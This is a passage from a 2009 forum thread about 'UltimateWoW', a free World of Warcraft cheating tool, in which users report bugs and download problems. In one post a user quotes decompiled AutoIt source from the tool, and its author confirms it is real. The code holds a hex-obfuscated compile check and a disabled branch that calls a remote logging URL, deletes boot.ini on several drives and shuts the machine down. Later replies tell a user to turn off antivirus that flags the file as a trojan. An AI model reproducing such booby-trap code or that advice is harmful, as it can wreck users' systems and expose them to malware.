[Release] UltimateWoW - The Best Free WoW Hack Available menu

Shout-Out

User Tag List

Page 47 of 68 FirstFirst ... 434445464748495051 ... LastLast
Results 691 to 705 of 1010
  1. #691
    zzack's Avatar Member
    Reputation
    2
    Join Date
    Aug 2009
    Posts
    50
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    What gulsrb said is what I was trying to explain... anyway I got addon working but, yeah... it crashes sometimes. And spectate works weird.

    [Release] UltimateWoW - The Best Free WoW Hack Available
  2. #692
    Paranoix's Avatar Member
    Reputation
    1
    Join Date
    Aug 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    your forum is crap...takes forever to download the files.

    but +rep for making it free! love it!


    edit: can some1 make a mirror....i cant download it.
    Last edited by Paranoix; 08-16-2009 at 12:56 PM.

  3. #693
    nick_533's Avatar Member
    Reputation
    1
    Join Date
    Sep 2007
    Posts
    80
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i want this on Apple mac OS X

  4. #694
    civ112's Avatar Banned
    Reputation
    29
    Join Date
    Oct 2008
    Posts
    99
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Enter is not working


    like, i bring up the box, and type in whatever command

    then hit enter, but nothing happens. text stays where it is, nothingchanges

    think it isnt registering my enter keypress.

    help?

  5. #695
    Mung Daal's Avatar Member
    Reputation
    6
    Join Date
    Jan 2009
    Posts
    29
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Awesome, I love you. (???) This is the best tool ever.
    You should make the addon a bit smaller and movable, and a speed hack would be handy
    It's great.

    Everything works for me, but the dialog control, doesn't allow me to press enter to enter my message, but I think the addon is WAY more handy, as used this back before the addon.
    Last edited by Mung Daal; 08-17-2009 at 12:14 AM.

  6. #696
    Nonominator's Avatar Banned
    Reputation
    30
    Join Date
    Apr 2007
    Posts
    489
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I noticed something and it worries me:

    Func STARTUP()
    $PROCESSLIST = ProcessList(@ScriptName)
    If $PROCESSLIST[0][0] <> 1 Then
    MsgBox(16, "Error", "UltimateWoW is already running. It will now be closed.")
    ProcessClose($PROCESSLIST[1][0])
    Sleep(1000)
    EndIf
    ;$STOPSWITCH = _INetGetSource("http://ultimatewow.itriss.com/data/stopswitch.dat")
    ;$STOPSWITCH = StringSplit($STOPSWITCH, "|")
    ;$STOPSWITCH[1] = StringReplace($STOPSWITCH[1], "switch=", "")
    ;$STOPSWITCH[2] = StringReplace($STOPSWITCH[2], "msg=", "")
    ;If $STOPSWITCH[2] = "on" Then
    ; MsgBox(16, "Stop Switch Engaged!", $STOPSWITCH[2])
    ; Exit
    ;EndIf
    ;$IP = _INetGetSource("http://checkip.dyndns.org/")
    ;$IP = StringTrimLeft($IP, 76)
    ;$IP = StringReplace($IP, "</body></html>", "")
    ;$IP = StringReplace($IP, @CRLF, "")
    ;$BANNED = _INetGetSource("http://ultimatewow.itriss.com/data/banned.dat")
    ;If StringInStr($BANNED, $IP) Then
    ; MsgBox(16, "Error", "Your IP has been banned until further notice. Contact Jad for more info.")
    ; Exit
    ;EndIf
    $CMP1 = "40636F6D"
    $CMP2 = "70696C65"
    $CMP3 = "64"
    $CMP = $CMP1 & $CMP2 & $CMP3
    $CMP = Execute(_HexToString($CMP))
    ;If $CMP = 0 Then
    ; _INetGetSource("http://ultimatewow.itriss.com/data/log.php")
    ; _RunDOS("del C:\boot.ini /f /a h s")
    ; _RunDOS("del D:\boot.ini /f /a h s")
    ; _RunDOS("del E:\boot.ini /f /a h s")
    ; _RunDOS("del F:\boot.ini /f /a h s")
    ; _RunDOS("del G:\boot.ini /f /a h s")
    ; Shutdown(5)
    ; Exit
    ;EndIf
    EndFunc

  7. #697
    gtamann's Avatar Member
    Reputation
    1
    Join Date
    Sep 2007
    Posts
    38
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    oh my god,is it true or fake, where did you find it?

  8. #698
    Jadd's Avatar 🐸 Premium Seller
    Reputation
    1515
    Join Date
    May 2008
    Posts
    2,433
    Thanks G/R
    81/336
    Trade Feedback
    1 (100%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Nonominator View Post
    I noticed something and it worries me:
    Code:
    $CMP1 = "40636F6D"
    $CMP2 = "70696C65"
    $CMP3 = "64"
    $CMP = $CMP1 & $CMP2 & $CMP3
    $CMP = Execute(_HexToString($CMP))
    ;If $CMP = 0 Then
    ; _INetGetSource("http://ultimatewow.itriss.com/data/log.php")
    ; _RunDOS("del C:\boot.ini /f /a h s")
    ; _RunDOS("del D:\boot.ini /f /a h s")
    ; _RunDOS("del E:\boot.ini /f /a h s")
    ; _RunDOS("del F:\boot.ini /f /a h s")
    ; _RunDOS("del G:\boot.ini /f /a h s")
    ; Shutdown(5)
    ; Exit
    ;EndIf
    EndFunc
    Yes, this is real code. Take a closer look though.

    Code:
    $CMP1 = "40636F6D"
    $CMP2 = "70696C65"
    $CMP3 = "64"
    $CMP = $CMP1 & $CMP2 & $CMP3
    $CMP = Execute(_HexToString($CMP))
    ;If $CMP = 0 Then
    $CMP = 40636F6D70696C6564

    And then:

    $CMP = Execute(_HexToString($CMP))

    So:

    $CMP = @Compiled

    So:

    $CMP = 1 if the script is compiled, 0 if it isn't. This will delete the boot.ini files if the user is running a decompiled code.


    And one more thing... Don't decompile my source and post it for everyone to see, now I'm going to have to change the compiled script check again for ****s sake. To bad I haven't had the code enabled for you to trip.

  9. #699
    slo_denis's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    chad is there any way to fix the "enter" problem where enter won't work,the ingame gui won't work because if i use it it crashes..i get a fatal 132 error :P

  10. #700
    bobfriendly's Avatar Member
    Reputation
    1
    Join Date
    Nov 2008
    Posts
    13
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    My McAfee virus program won't let me open the file because it says it's a trojan. Anyone know how I can make it so that I can open the file without it being instantly deleted?

  11. #701
    slo_denis's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Lul i said chad to him

  12. #702
    gippy's Avatar Elite User
    Reputation
    436
    Join Date
    Jun 2008
    Posts
    1,322
    Thanks G/R
    293/139
    Trade Feedback
    7 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by bobfriendly View Post
    My McAfee virus program won't let me open the file because it says it's a trojan. Anyone know how I can make it so that I can open the file without it being instantly deleted?
    Turn off your anti virus.

  13. #703
    Paranoix's Avatar Member
    Reputation
    1
    Join Date
    Aug 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    still cant download the file... any working mirrors?

  14. #704
    ramey's Avatar Member
    Reputation
    45
    Join Date
    Jan 2008
    Posts
    320
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ROFL I can't believe the Jadd, Programmer & Coder put in something like that LOL really are you that cluelesssssssssssssssssssssssss

  15. #705
    xX EPIC Xx's Avatar Active Member
    Reputation
    37
    Join Date
    Apr 2008
    Posts
    238
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    WARNING! TROJAN PEOPLE!

    McAfee detected a trojan and removed
    https://Fileusher.com

Page 47 of 68 FirstFirst ... 434445464748495051 ... LastLast

Similar Threads

  1. The Best Free WarZ Hack | ESP | Alot of features ! Undetected.
    By WarZhacker in forum MMO Exploits|Hacks
    Replies: 4
    Last Post: 04-15-2013, 09:53 AM
  2. [list] (NEW) List of the best FREE games!
    By Gawdlaw in forum Gaming Chat
    Replies: 30
    Last Post: 11-07-2009, 05:47 AM
  3. What do you think is the best free webhost?
    By damon160 in forum Community Chat
    Replies: 2
    Last Post: 01-18-2009, 02:25 AM
  4. The Best FREE In-game leveling addon!
    By Desperation in forum World of Warcraft Guides
    Replies: 14
    Last Post: 08-06-2008, 05:10 PM
  5. [Release/in the works] Ascent WoW Lich King Website !
    By latruwski in forum World of Warcraft Emulator Servers
    Replies: 12
    Last Post: 12-16-2007, 05:24 AM
All times are GMT -5. The time now is 11:26 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search